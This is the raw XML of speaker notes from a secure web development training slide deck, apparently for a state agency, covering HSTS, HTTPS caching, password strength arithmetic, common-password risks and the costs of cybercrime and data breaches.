            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> you encrypt the data in transit, it’s counterproductive and dangerous to then save the data on disk in “plain text”.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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1516317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it may take some work to ensure that HTTPS stuff is not cached</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> across all browsers and platforms.  But (luckily), you can create some “boilerplate” that is easily included on all your pages.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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2303629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Strict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Transport Security (HSTS) header tells the client’s browser that it is now in a “secure session”.  If a man-in-the-middle proxy attempts to revert to http, the browser will automatically translate to https, and maintain the end-to-end encryption. So an attacker can’t “drop” the encryption when you’re not looking – the browser (if a modern conforming browser) will force https.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Not all browsers cooperate – older browsers pre-date this header, and therefore ignore it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Self-signed certificates can be a problem. HSTS does NOT ask the user if it should continue if there is a certificate issue (expired, name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-match, self-signed, etc.).  If the certificate is not perfect, HSTS will force session termination. Insecure embedding (JavaScript) is also prohibited. So this MAY “break” your site (or “will break”, if you have self-signed certs, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So, as always,  TEST thoroughly in a production-like environment BEFORE going production  (but you always do this anyway, right??)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Watch the video: https://www.youtube.com/watch?v=zEV3HOuM_Vw&amp;index=4&amp;list=PL8239DA448CC2BB7C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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="800330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All serious attackers include a RECON phase as part of their attack. During this phase, the attacker(s) attempt to map out your site (and other things…). Supplying links to your test and admin assets just helps them find “the good stuff” that much faster.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that obscurity in itself is NOT protection against incursions – but in conjunction with other measures (have you been paying attention so far?), can at least slow attackers down, and possibly help convince them that “it’s not worth the effort”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This rule works best if you also segregate test/admin assets from “normal” assets and use non-obvious names for these assets (see Infrastructure Rule #7, later) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Not having search engines list your secure pages is mostly a “good thing”.  However, if you run vulnerability scanners (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>AppScan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, for example) against your site, be SURE to ADD the “authorized” path(s) to the scan parameters so that your secure pages can be tested…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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14850751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Attackers can use “brute force” attacks to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> try all possible combinations of characters as a password.  The number of possible combinations for any password can be determined using this formula:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(number of symbols in the alphabet) ^ (number of symbols in the password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Here the “^” is used to denote “raised to the power of”. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that while this is true only if passwords are created from randomly selected characters (perhaps by password managers like Last Pass or Keep pass), most passwords are actual words, or “almost words” (like “P@$$w0rd”) that can be determined by using a dictionary attack. Using actual (or “almost”) words significantly reduces the number of possibilities from the “power of” formula number – but password length is still an indicator of password strength (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Ionger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>=stronger).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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33996741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we limit the number of symbols in our “alphabet” to 5 (NOTE:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> DO –NOT– DO THIS!!!! I am deliberately using small numbers to keep the results small enough to make comparisons - at least a little bit -  less mentally taxing) – say, “A”, “B”, “C”, “D”, and “E” -and require 8 characters in a password, the total number of possible passwords is 390,625, (5^8) as shown in the above chart (left column inside the blue box). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Doubling the number of symbols in the alphabet to 10 (but keeping the 8 character password) increases the potential number of passwords to 100,000,000 ( 10^8 , in the right column of the blue box). So adding more symbols to the alphabet WILL increase the possible number of passwords (in this case, by a factor of 256) , which increases the time required to “brute force”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that if we double the characters required in a password from 8 to 16 (instead of doubling the symbols, so back to original 5 symbols),  the total possible passwords has increased to 152,587,890,625 (5^16) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So doubling the number of alphabet symbols (same length password) increased the number of potential passwords by a factor of 256 (256 x), while doubling password length instead (same number of alphabet symbols) increased the potential passwords by a factor of   390,625 (390,625 x).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Increasing the length is better than increasing the number of symbols in the alphabet, because it increases the exponent (“power”). However, extremely long passwords are difficult to remember.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>“Longer is better”. So require more characters and suggest a “passphrase” instead of a “password”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Current minimum acceptable password length recommendation is at least 10 characters (AND PREFERABLY LONGER), including upper and lowercase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>alphabetics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, numeric digits, and special characters for the symbol set.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Using a 10 char password composed of a few special characters (the 8 special chars !, @, #, A, $, %, *,and _, for example), 10 digits (0-9), and 26 upper and 26 lower case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>alphabetics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (70 symbols in the alphabet) results in 70^10 possible passwords!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is a pretty large number - 2,824,752,490,000,000,000  if my calculator didn’t round off/truncate anyplace…  If some hacker wanted to build a rainbow table of all possible passwords, the table would be 118,639,604,580,000,000,000 bytes, assuming each table entry  requires 10 characters for the actual password, plus (probably) 32 bytes for the hash (SHA256).  That’s 118.64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>exabytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>… not to mention how long it would take to hash each of the 2,824,752,490,000,000,000 possible passwords…  And you should have a “salt” that would require multiple rainbow tables… So this should be safe for a few years…</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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3328383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things have changed…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web defacements and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (D)DOS attacks still occur, and are therefore still an issue,  but new attacks have surfaced that are strictly aimed at making money or stealing valuable information (trade secrets, business plans, classified information, etc.). And many of these attacks are “stealthy”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Attacking web sites has become a potentially profitable endeavor, as banks, brokerages, and businesses of every kind (some even illegal) are now on the web. And these businesses collect data including customer financial information (account numbers, balances, credit card numbers, etc.) and personal information (names, addresses, etc.) and store it in a database(s). And tis data can be “monetized” by criminals.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Not only have criminals used this data to “tap in” to business customers’ bank accounts, they have also used the information to steal clients’ IDs and open lines of credit, and purchase goods and services in the clients’ names..</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Literally tens of billions of dollars are lost each year to online fraud.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> In June, 2014, the Center for Strategic and International Studies in Washington, D.C., estimated the total cost of cyber crime to be $575 billion per year. And that figure may not account for all of the loss of intellectual property and costs of litigation that can result from the theft of data (such as the credit card and personal information stolen from more than 100 million Target customers last year, at a cost to the Target of $148 million in the second quarter of 2014).  See: http://www.govtech.com/security/Russian-Hackers-Are-Greatest-Criminal-Threat-of-21st-Century-Expert-Says-.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>78% of the 1,860 data breaches reported during the first six months of 2015 (exposing 228 million records) due to "hacking". (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.riskbasedsecurity.com/2015/07/mid-year-2015-78-of-1860-data-breaches-the-result-of-hacking/). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> $$$indeterminate at this point.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And how can you set a price on the potential damage to national security that may eventually result from the theft from OPM of detailed data on millions of federal employees, including security-related agency operatives?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In addition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to the money that the web site owner loses directly from an attack, there are additional costs: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Costs to remediate the security “holes” in their web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Costs for research/hardware/activities related to avoiding future attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Intellectual property losses (Sony’s movies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Social/political embarrassment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Exposure of short and long term business plans that competitors may leverage </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Loss of reputation that reduces revenues for a time – and may even preclude eventual recovery of the business.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>While actual value of losses due to ALL online fraud is difficult to determine, LexisNexis estimates that it costs the average victim  $2.79 for each $1 of fraud (http://www.lexisnexis.com/risk/downloads/assets/true-cost-fraud-2013.pdf).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>DOJ estimates that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>CryptoLocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> compromised more than 260,000 computers worldwide in 2013. The average ransom charged by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>CryptoLocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> attacker can be as high as $1,000, with no assurance that you’ll ever be able to access your data again…(The FBI believes about $30 million in ransom was collected between September and December 2013 alone)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Identity theft (stealing financial account numbers directly, or accessing information that allows an attacker to impersonate someone else and open lines of credit in the victim’s name) is increasing. There is an incident of identity theft every 3 seconds, resulting in literally billions of dollars lost. (http://www.identitytheftassistance.org/pageview.php?cateid=47). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Because we collect information about our citizens that can unintentionally assist identity thieves; we need to safeguard our data in order to protect our fellow Ohioans.  This is an ethical requirement – and in case that doesn’t convince you, it’s also a legal requirement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>With the payoff to identity thieves being so great, attackers are willing to spend time and money to discover and exploit flaws in order to gain access to this information.  Valuable information that assist ID thieves to assume your identity include credit card/bank numbers, social security numbers, date of birth, address (both current and historical), medical records, education history, mother’s maiden name, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And the “payoff” to attacker nation-states is immeasurable, as the attackers can potentially gain access to global financial, military, and political strategies, and access top secret documents of all kinds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>More examples: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Russian hackers steal over a billion usernames and passwords: http://www.computerweekly.com/news/2240226285/Russian-hackers-steal-over-a-billion-usernames-and-passwords?asrc=EM_NLS_32433731&amp;utm_medium=EM&amp;utm_source=NLS&amp;utm_campaign=20140806_Malware%20breaks%20new%20ground%20in%20AV%20evasion_mbacon </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>U.S. government warns of point-of-sale malware campaign: http://searchsecurity.techtarget.com/news/2240226048/US-government-warns-of-point-of-sale-malware-campaign?track=NL-1820&amp;ad=895262&amp;asrc=EM_NLS_32433732&amp;uid=15836926&amp;utm_medium=EM&amp;utm_source=NLS&amp;utm_campaign=20140806_Malware+breaks+new+ground+in+AV+evasion_mbacon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Staples - http://searchsecurity.techtarget.com/news/2240237192/Staples-data-breach-update-116-million-cards-1400-stores-affected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Sony - http://searchsecurity.techtarget.com/news/2240237861/Sony-Pictures-hack-recap-Experts-debate-North-Koreas-role?utm_medium=EM&amp;asrc=EM_NLN_38679283&amp;utm_campaign=20150114_Microsoft%20patches%20controversial%20zero-day%20vulnerability%20disclosed%20by%20Google_mbacon&amp;utm_source=NLN&amp;track=NL-1820&amp;ad=898314</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Chick-Fil-A - http://searchsecurity.techtarget.com/news/2240237466/Report-Chick-Fil-A-data-breach-affects-locations-nationwide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>OPM - http://www.nextgov.com/cybersecurity/2014/12/opm-alerts-feds-second-background-check-breach/101622/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And these are just the tip of the iceberg.</a:t>
            </a:r>
          </a:p>
          <a:p>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C20B865-30AA-490B-91EC-B55FD200A00E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38614382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if you use your pet’s,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> children’s, or significant other’s name, or birthday/ etc., you’ve pretty much defeated the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>combinatorics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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10012098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list of the “top 20” passwords.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  If your password - for ANY of your devices/web sites - is on this list, CHANGE IT NOW!!! (go ahead, do it now – it’s important - I’ll wait…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>It isn’t always necessary to “brute force” passwords.  A smart password cracker will try common passwords (and variations – upper/lower mix, simple letter substitutions  like ‘$’ for ‘S’ or ‘0’ for ‘O’, etc.) first, then resort to “brute force” only if that doesn’t work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>From  http://www.networkworld.com/article/2226175/microsoft-subnet/top-25-most-commonly-used-and-worst-passwords-of-2013.html </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Of course, there are other lists:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>1,000 most common passwords: http://www.geeknoob.com/1000-most-common-passwords.html </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>10,000 common passwords: https://github.com/discourse/discourse/blob/master/lib/common_passwords/10k-common-passwords.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Aside: it is estimated that 98.8% of all users use a password on the 10,000 list… so 10,000 tries (or average of 5,000) will  net you access to 98.8% of assets…if the estimate is correct.  This would require a trivial amount of computer time to try… (or for a faster and almost as sure-fire hack, it is estimated that 91% of the passwords are in the 1,000 list…)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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23010126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Multi-factor authentication requires more than just a password – it requires 2 (or sometimes more) separate factors</a:t>
